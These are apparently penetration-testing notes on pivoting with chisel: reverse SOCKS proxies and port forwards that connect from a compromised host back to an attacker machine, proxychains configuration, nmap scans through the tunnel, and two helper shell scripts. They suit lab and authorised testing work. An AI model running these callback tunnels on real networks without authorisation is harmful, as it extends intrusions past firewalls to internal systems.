CHISEL
Reverse SOCKS Proxy #######################################################################
#This connects back from a compromised host to a chisel server listening on our attacking machine, so no inbound port has to be open on the target.
# & is used to background a process in the commands below
#On our own attacking box we would use a command that looks something like this:
./chisel server -p LISTEN_PORT --reverse &
example: chisel server -p 8000 --reverse
#On the compromised host, we would use the following command:
#This command connects back to the waiting listener on our attacking box, completing the proxy.
./chisel client ATTACKING_IP:LISTEN_PORT R:socks &
example: chisel.exe client 10.14.14.14:8000 R:socks
#The SOCKS proxy is opened on the chisel server side, i.e. on our attacking machine, at 127.0.0.1:1080 (chisel's default for R:socks). Tools on the attacking box therefore send traffic to 127.0.0.1:1080 to reach the networks behind the compromised host.
#To use proxychains, add the following line to the [ProxyList] section of /etc/proxychains.conf (and comment out the default socks4 127.0.0.1 9050 Tor entry, otherwise strict_chain tries a proxy that is not running and every connection fails):
socks5 127.0.0.1 1080
Then use proxychains with your favourite tools. Only full TCP connections go through a SOCKS proxy (no SYN scans, no ICMP ping, no UDP), so use a connect scan and skip host discovery:
proxychains nmap -sC -sT -Pn -p 80 172.19.0.4
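The proxychains setup above as a script, added here as an example that is not part of the original notes or the chisel project. It writes a constructed stand-in for a stock proxychains.conf, comments out every existing proxy entry and appends the socks5 line for chisel's listener, and shows the nmap invocation that actually works through a SOCKS proxy. It assumes the proxychains / proxychains-ng config syntax (a [ProxyList] section with one "type host port" line per proxy) and POSIX sh with sed -E.

```shell
#!/bin/sh
# Added example (not from the original notes or the chisel project): point
# proxychains at the SOCKS listener that "chisel client ... R:socks" opens on
# the chisel server, i.e. on our attacking box, 127.0.0.1:1080 by default.
# Assumptions: proxychains / proxychains-ng config syntax ([ProxyList] section,
# one "type host port" line per proxy); POSIX sh plus sed -E.
set -u

# Write a constructed stand-in for a stock /etc/proxychains.conf to PATH, so
# the functions below can be exercised without touching the real file.
write_sample_conf() {
    cat > "$1" <<'EOF'
# proxychains.conf  VER 4.x (constructed sample, trimmed)
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 127.0.0.1 9050
EOF
}

# Make CONF's [ProxyList] contain exactly one active entry: socks5 HOST PORT.
# Pre-existing socks4/socks5/http lines are commented out rather than deleted:
# in strict_chain mode proxychains goes through every listed proxy in order,
# so a leftover Tor entry on 9050 that is not running breaks every connection.
configure_proxychains() {
    conf="$1"; host="${2:-127.0.0.1}"; port="${3:-1080}"
    [ -f "$conf" ] || { echo "no such config: $conf" >&2; return 1; }
    case "$port" in
        ''|*[!0-9]*) echo "bad port: $port" >&2; return 1 ;;
    esac
    [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || { echo "bad port: $port" >&2; return 1; }

    sed -E 's/^[[:space:]]*(socks4|socks5|http)[[:space:]]+/# &/' "$conf" > "$conf.tmp" \
        && mv "$conf.tmp" "$conf"
    grep -q '^\[ProxyList\]' "$conf" || printf '\n[ProxyList]\n' >> "$conf"
    printf 'socks5 %s %s\n' "$host" "$port" >> "$conf"
}

# Print the proxy entries that are currently active (uncommented) in CONF.
active_proxies() {
    grep -E '^[[:space:]]*(socks4|socks5|http)[[:space:]]+' "$1"
}

# Through a SOCKS proxy only full TCP connects are possible: no SYN scans
# (-sS needs raw sockets), no ICMP/ARP host discovery, no UDP. Hence -sT
# (connect scan) and -Pn (treat the host as up). -n skips DNS; with proxy_dns
# set, name lookups would otherwise be pushed through the tunnel as well.
scan_via_proxy() {
    proxychains nmap -sT -Pn -n -p "$1" "$2"
}

# Demo on a temp copy, run as: sh proxychains_setup.sh demo
demo() {
    tmp=$(mktemp)
    write_sample_conf "$tmp"
    configure_proxychains "$tmp"
    echo "active proxies in $tmp:"
    active_proxies "$tmp"
    rm -f "$tmp"
}

case "${1:-}" in
    demo) demo ;;
esac
```

Run it against a copy of the real file first (configure_proxychains /tmp/pc.conf) and diff before pointing it at /etc/proxychains.conf; on distributions that ship proxychains-ng the file is /etc/proxychains4.conf.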
Remote Port Forward #######################################################################
#A remote port forward is where the compromised target connects back to us and asks the chisel server on our side to open the forwarded port.
#On our attacking machine we use the same command as before:
./chisel server -p LISTEN_PORT --reverse &
#Once again this sets up a chisel listener for the compromised host to connect back to.
#The command to connect back is slightly different this time, however:
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &
##### DESCRIPTION
ATTACKING_IP: The IP of our own attacking machine, where the chisel server is listening.
LISTEN_PORT: The port we started the chisel server on; the compromised host must be able to reach it.
LOCAL_PORT: The port opened on our attacking machine; connections to it are tunnelled to TARGET_IP:TARGET_PORT.
TARGET_IP: The internal IP we found, reachable from the compromised host but not from us.
TARGET_PORT: The port on TARGET_IP that we want to reach.
## EXAMPLE
Let's assume that our own IP is 172.16.0.20, the compromised server's IP is 172.16.0.5, and our target is port 22 on 172.16.0.10. The syntax for forwarding 172.16.0.10:22 back to port 2222 on our attacking machine would be as follows:
./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &
Connecting back to our attacking machine, functioning as a chisel server started with:
./chisel server -p 1337 --reverse &
This lets us reach 172.16.0.10:22 over SSH by connecting to 127.0.0.1 port 2222 on our attacking machine.
Local Port Forward #######################################################################
#As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.
#On the compromised target we set up a chisel server (no --reverse here). This needs an inbound connection to the target, so a firewall in front of it may block it; that is why the reverse variant is usually preferred.
./chisel server -p LISTEN_PORT
#We now connect to this from our attacking machine like so:
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
#For example, to connect to 172.16.0.5:8000 (the compromised host running a chisel server), forwarding our local port 2222 to 172.16.0.10:22 (our intended target), we could use:
./chisel client 172.16.0.5:8000 2222:172.16.0.10:22
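The remote and local forward recipes above, as one added example that is not part of the original notes or the chisel project: a POSIX shell script that validates the fields and emits the matching server and client command pair for either direction, so the two sides cannot drift apart. Field names follow the DESCRIPTION above (ATTACKING_IP, LISTEN_PORT, LOCAL_PORT, TARGET_IP, TARGET_PORT); a ./chisel binary on both ends is assumed, and the optional bind address for the remote forward is an addition the notes do not show.

```shell
#!/bin/sh
# Added example, not part of the original notes or the chisel project: build
# the matching server/client command pair for a chisel remote (reverse) or
# local port forward, validating the fields first. Field names follow the
# notes above (ATTACKING_IP, LISTEN_PORT, LOCAL_PORT, TARGET_IP, TARGET_PORT);
# a ./chisel binary on both ends is assumed.
set -u

# Dotted-quad IPv4 only: four fields, 1-3 digits each, every octet <= 255.
# Hostnames are rejected on purpose; inside a pivot we rarely have DNS for
# the internal range, and a typo here silently forwards to the wrong host.
valid_ip() {
    _old_ifs=$IFS; IFS=.
    set -f; set -- $1; set +f
    IFS=$_old_ifs
    [ $# -eq 4 ] || return 1
    for _octet in "$@"; do
        case "$_octet" in ''|*[!0-9]*|????*) return 1 ;; esac
        [ "$_octet" -le 255 ] || return 1
    done
}

valid_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Shared checks: two IPs followed by any number of ports. Prints the reason
# to stderr and fails on the first bad field.
check_fields() {
    valid_ip "$1" || { echo "bad IP: $1" >&2; return 1; }
    valid_ip "$2" || { echo "bad IP: $2" >&2; return 1; }
    shift 2
    for _p in "$@"; do
        valid_port "$_p" || { echo "bad port: $_p" >&2; return 1; }
    done
}

# Remote (reverse) forward: ATTACKING_IP LISTEN_PORT LOCAL_PORT TARGET_IP TARGET_PORT [BIND].
# Line 1 runs on the attacking box, line 2 on the compromised host. Without a
# bind address chisel binds LOCAL_PORT on all interfaces of the server, so
# pass 127.0.0.1 as BIND when the tunnel must not be reachable from elsewhere.
remote_forward() {
    check_fields "$1" "$4" "$2" "$3" "$5" || return 1
    _bind="${6:-}"
    printf './chisel server -p %s --reverse\n' "$2"
    printf './chisel client %s:%s R:%s%s:%s:%s\n' "$1" "$2" "${_bind:+$_bind:}" "$3" "$4" "$5"
}

# Local forward: LISTEN_IP LISTEN_PORT LOCAL_PORT TARGET_IP TARGET_PORT.
# Line 1 runs on the compromised host (no --reverse), line 2 on the attacking
# box; the target must accept an inbound connection on LISTEN_PORT.
local_forward() {
    check_fields "$1" "$4" "$2" "$3" "$5" || return 1
    printf './chisel server -p %s\n' "$2"
    printf './chisel client %s:%s %s:%s:%s\n' "$1" "$2" "$3" "$4" "$5"
}

# Usage: sh chisel_fwd.sh remote 172.16.0.20 1337 2222 172.16.0.10 22
#        sh chisel_fwd.sh local  172.16.0.5  8000 2222 172.16.0.10 22
case "${1:-}" in
    remote) shift; remote_forward "$@" ;;
    local)  shift; local_forward "$@" ;;
esac
```

With the page's own numbers, `remote` prints the server line from the example above (./chisel server -p 1337 --reverse) followed by the client line (./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22); the `local` variant reproduces the 172.16.0.5:8000 pair. Append & yourself when you want the processes backgrounded.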